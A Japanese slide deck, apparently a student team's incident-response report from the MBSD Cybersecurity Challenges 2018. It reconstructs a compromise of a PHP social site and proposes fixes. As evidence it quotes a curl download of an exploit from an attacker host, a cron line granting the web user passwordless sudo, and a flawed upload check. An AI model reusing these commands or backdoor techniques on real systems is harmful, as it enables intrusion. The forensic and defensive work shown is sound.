MBSD Cybersecurity Challenges 2018

MBSD Cybersecurity
Challenges 2018
[なんでもいい@Aso /Nihon/Fukuoka]$
1

アジェンダ
1. チーム紹介
2. 被害の範囲
3. 攻撃に使われた脆弱性と対策
4. 対応方法
5. まとめ
2

チームメンバー
◆中山怜也（なかやまれいや）
◆河原慎之介（かわはらしんのすけ）
ツールを用いた脆弱性の調査
PHPのソースコード解析
サーバサイド
◆竹﨑友哉（たけざきともや）
◆本田翔太郎（ほんだしょうたろう）
ツールを用いた脆弱性の調査
各種ログ解析
4
プログラムサイド

９月１９日
情報の漏洩
脆弱性検査ツール使用
９月２１日
情報の漏洩
ウェブサーバ侵入
９月２２日 root 権限昇格
９月２６日
SSHログイン
ログインページ改ざん
XSS攻撃
９月２８日
情報の漏洩
バックドア設置
トップページ改ざん
・登録されているユーザアカウント情報
（ユーザ ID、ユーザネーム、性別、生年月日）.................８件
・ユーザの日記..............................................................３３件
・ユーザのメッセージ...................................................２１件
攻撃者サーバ
サーバ侵入に向けた情報収集
個人情報入手
6

攻撃者サーバ
/var/www/html/webmix3/ 内
・index.php
・login.php
・sendmessage.php
・libs.php
・/class/class.php
・/class/User.php
６件
ソースコードや設定ファイル収集
7
５件
/etc/ 内
・passwd
・shadow
・hosts
・issue
・/httpd/conf/httpd.conf
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

攻撃者不正なPHPファイル
コマンド
su -l
送信
8
※任意のコマンドを実行するプログラム
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

攻撃者サーバ
不正なPHPファイルのアップロード
9
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

攻撃者サーバ
コマンド送信！
任意のコマンドを用いて
サーバ内の操作が可能に！！！
※root 権限は無い
10
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

攻撃者実行ファイル
DirtyCOWの脆弱性
を使用した権限昇格
を行うプログラム
11
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

攻撃者
コマンド
curl -O http://xxx
送信
12
サーバ
サーバを操作し、
実行ファイルを
ダウンロード！！！
不正なPHPファイル
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

サーバ
昇格！！！
13
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

攻撃者サーバ
コマンド送信！
root 権限で！
任意のコマンドを用いて
サーバ内の操作が可能に！！！
14
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

攻撃者サーバ
15
SSHログインの設定を行い、
PHPファイルを通さずサーバに
直接侵入可能に！
SSHログイン！９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

正規ユーザサーバ
16
利用者IDとPWの送信
tmp/.z
利用者ID・PW
溜まったら、
ダウンロード..!!
攻撃者
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

17
不正なスクリプトを埋め込んだ日記
罠にかかれ...!!!
攻撃者
正規ユーザ
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

18
/var/www/html/webmix3/ 内
・register.php
・logout.php
・user.php
・changeprofile.php
・userlist.php
・writediary.php
・help.php ２件７件
攻撃者サーバ
ソースコードや設定ファイル収集
/etc/ 内
・shadow
・group
・redhat-release
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

19
・ユーザのパスワード.................................................５件
・ユーザの日記........................................................１４件
・ユーザのメッセージ.................................................３件
攻撃者サーバ
個人情報入手
tmp/.z
利用者ID・PW
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

攻撃者
バックドア用
PHPファイル
20
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩
※任意のコマンドを実行するプログラム

攻撃者サーバ
バックドアのアップロード
21
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

22
攻撃者サーバ
トップページ改ざん！
改ざん後トップページ正規ユーザ
９月１９日
情報の漏洩
９月２１日
情報の漏洩
９月２６日
SSHログイン
XSS攻撃
９月２８日
情報の漏洩

・登録されているユーザアカウント情報
（ユーザ ID、ユーザネーム、性別、生年月日）.....................８件
・ユーザのパスワード..............................................................５件
・全てのユーザの日記........................................................４７件
・全てのユーザのメッセージ.............................................２４件
◇MBSD SNSサイト内の情報◇
正規ユーザのほぼ全ての情報が漏洩 23

/var/www/html/webmix3 内
・index.php
・register.php
・login.php
・logout.php
・user.php
・changeprofile.php
・userlist.php
・sendmessage.php
・writediary.php
・help.php
・libs.php
・/class/class.php
・/class/User.php
◇サーバ内の情報◇
２０件
24
/etc/ 内
・passwd
・shadow
・hosts
・issue
・group
・redhat-release
・/httpd/conf/httpd.conf
ソースコードや設定ファイルが漏洩

攻撃に使われた脆弱性と対策
25

1. MySQLのrootユーザのパスワードが未設定
2. DirtyCOW の脆弱性
3. userlist.php におけるSQLインジェクション
4. 不正な形式のファイルをアップロード可能
5. readdiary.php におけるXSS
6. phpinfo.php が公開されている
7. 存在するユーザにアクセスしようとするとForbidenが表示される
8. 他人の日記を書き換えることが可能
9. readdiary.php のセマンティックURL攻撃に対する脆弱性
10. sendmessage.php のメッセージ送信の宛先に関する問題
11. user.php のセマンティックURL攻撃に対する脆弱性
12. 各画面のcsrfの脆弱性
攻撃者に発見された脆弱性リスト
[ 8.2 ]
[ 7.8 ]
[ 7.5 ]
[ 6.4 ]
[ 6.1 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 4.3 ]
CVSS v3 評価
(基本評価基準)
26

侵入に利用された脆弱性リスト CVSS v3 評価
27
[ 8.2 ]
[ 7.8 ]
[ 7.5 ]
[ 6.4 ]
[ 6.1 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 4.3 ]

侵入に利用された脆弱性リスト CVSS v3 評価
28
[ 8.2 ]
[ 7.8 ]
[ 7.5 ]
[ 6.4 ]
[ 6.1 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 5.3 ]
[ 4.3 ]

不正な形式の
ファイルをアップロード可能
29

不正な形式のファイルをアップロード可能
・本来の仕様では、ファイル名の末尾が「.jpg」以外はアップロードできない
・不正な場合エラー画面が表示されるが、ファイルはアップロードされてしまう
※ メッセージ送信画面
※ メッセージ送信後画面 30

不正な形式のファイルをアップロード可能
31

流れ図(sendmessage)
move_uploaded_file(
$_FILES[‘file’][‘tmp_name’],”./tmp/”.$tname)
&&
preg_match(“/^[^.]+¥.jpg$/”,$tname))
ファイルを”./tmp/”にアップロード
し、成功しているか
&&
ファイル名の末尾が ”.jpg” であるか
Sendmessage.php
の19行目
32

preg_match("/^[^.]+¥.jpg
$/",$tname)
move_uploaded_file(
$_FILES[‘file’][‘tmp_name’],”./t
mp/”.$tname)
流れ図
ファイルを ”./tmp/” にアップ
ロードし、成功しているか
ファイル名の末尾が
”.jpg” であるか
hoge.php
33

Dirty COW とは
・約２年前に公開（CVE-2016-5195）
・Linuxカーネルに起因する脆弱性
・一般ユーザがシステム上で権限昇格可能に
35

/tmp/.aについて
[root@sns tmp]# strings .a | tail -n2
/etc/cron.hourly/0anacron
echo 'apache ALL=(ALL) NOPASSWD:ALL'>/etc/sudoers.d/a
これによってなんでもできてしまうユーザに
-bash-4.1$ echo $USER
apache
-bash-4.1$ sudo whoami
root
36

/tmp/.aについて
[root@sns tmp]# cat /etc/cron.hourly/0anacron
#!/bin/bash
echo 'apache ALL=(ALL) NOPASSWD:ALL'>/etc/sudoers.d/a
/etc/cron.hourlyフォルダとは
一時間毎に実行される自動タスクを配置
37

対策：Dirty COW について
カーネルのアップデート
# yum update kernel
# reboot
# uname -r
2.6.32-754.6.3.el6.i686
38

対策：/tmp/.aについて
カーネルアップデート後に、権限昇格用プログラム/tmp/.aを実行
権限昇格が行われなくなった！
39

まず謝罪しましょう！
41

Webアプリケーション（webmix3）サイド
対処内容理由
ファイル「webmix3/tmp/.5a566099006d3b60892fb0
91dac8d1bfwebshell.php 」の消去
攻撃者が仕込んだ「バックドア」のファイル。
Webサーバへ命令を送信し、実行させられる。
ファイル「webmix3/tmp/.z」の消去利用者ID・パスワードを搾取するためのファイル。
webmix3/tmp 配下に不正にアップロードされたファイルの消
去
攻撃者が調査のため、脆弱性を用いて保存させたファイル。
phpinfo.phpの消去サーバの設定情報などを攻撃者に与えてしまうファイル。
login.phpの改ざん箇所の消去利用者ID・パスワードを搾取するため改ざんされたソースコード。
index.htmlの消去攻撃者が改ざんしたトップページのファイル。
バックアップからindex.phpの復旧改ざんされたトップページの復旧。
脆弱性リストにて記載した脆弱性への対策再度同じ攻撃を行なわれないための対策。
暫定的な対処 - サービス再開に向けて 1
42

暫定的な対処 - サービス再開に向けて 2
サーバサイド
対処内容理由
MySQLサーバ内のrootユーザに対してパスワードを設定万が一、攻撃者がMySQLに接続できてしまった場合、容易にrootでアク
セスされ、MySQL上で可能なことは何でもできてしまう。
MySQLデータベースのuserテーブル内で、root@%のレコ
ードを削除
運用に不要な権限はできるだけ減らしたほうが良い。
ファイアウォール(iptables)の設定変更運用に不要なポートが開いている場合、標的にされやすくなってしまう。
/tmp/.aファイルを削除攻撃者が使用した権限昇格用のプログラム。
MySQLのテーブルに登録された、不正な情報を含む行の削
除
XSS等で不正に登録されてしまったもの。
HTTPアクセスをHTTPSにリダイレクトする HTTP通信では平文でデータを送信するので、IDとパスワード等のログイ
ン情報が盗聴されてしまう可能性があるため。
カーネルのアップデート現在では脆弱性のある古いカーネルを使用しているため。
43

恒久的な対策
構成面
対処内容理由
WAFの導入
継続的に、高いレベルのセキュリティを実現できる。
IPSの導入
セキュリティソリューションサービスの利用
運用面
OSやソフトのバージョン管理攻撃に使用される脆弱性を減らすことができる。
セキュリティ監査の定期的な実施運用方法の問題や、ソースコードの脆弱性を発見できる。
定期的にシステム全体の改ざんの有無を調査改ざんの被害にあった場合でも、被害の拡大を防止できる。
ログ監視の強化攻撃による致命的な問題の発生前に、対処することができる。
従業員へのセキュリティ教育の徹底ルールを定め、遵守させるためにセキュリティ意識の向上。
44
MBSDさんのサービスを利用する

被害を発生・拡大させた原因
● 運営のセキュリティ意識の低さ
● 運営の攻撃発見の遅さ
● phpinfo();関数があるPHPファイルを見ることができた
● MySQLのroot設定が脆弱
○ MySQLサーバ内のrootユーザに対してパスワードが設定されていない
○ MySQLデータベースのuserテーブル内で、root@%のレコードが存在する
● ソースコードが脆弱すぎる
● システムのバージョンが古すぎる
○ CentOS 6のサポートは２０２０年１１月終了 46

被害を発生・拡大させた原因
運営のセキュリティ意識の低さ
47

ログ監視の強化について
48

工夫した点
・まずシステムの機能を把握し、調査を行った
・情報をGETやPOSTで渡している箇所を重点的に調査
・サーバサイドと連携し、ログを元に、攻撃されたと思われる箇所を調査した
サーバサイド
・サーバにインストールされているソフトのバージョンをリスト化
→CVE Detailsを用いて脆弱性をリスト化
・使い慣れたExcelを用いて詳細にログを分析
→httpdやsecure、MySQL等のログ情報をまとめ、タイムラインを作成
データベース内の情報等、様々な情報を突合せながら分析
49
プログラムサイド

使用したツール
ログ解析
Excel
自作したJavaプログラム
ヘッダの改ざん
burpsuite
sqlインジェクション、データベース搾取
sqlmap
脆弱性診断ツール
nessus
vuls
open-vas
ウェブサイト診断
skipfish
nikto
ソフトウェア脆弱性データベース
CVE Details
EXPLOIT DATABASE
エクスプロイトキット
Metasploit
ポートスキャン
nmap
SPARTA
静的脆弱性検査ツール
PHP RIPS
共通脆弱性評価システム
ファイル転送
WinSCP
ネットワーク・アナライザ・ソフトウェア
WireShark
50

MBSD Cybersecurity Challenges 2018

More Related Content

What's hot

Similar to MBSD Cybersecurity Challenges 2018

MBSD Cybersecurity Challenges 2018

Editor's Notes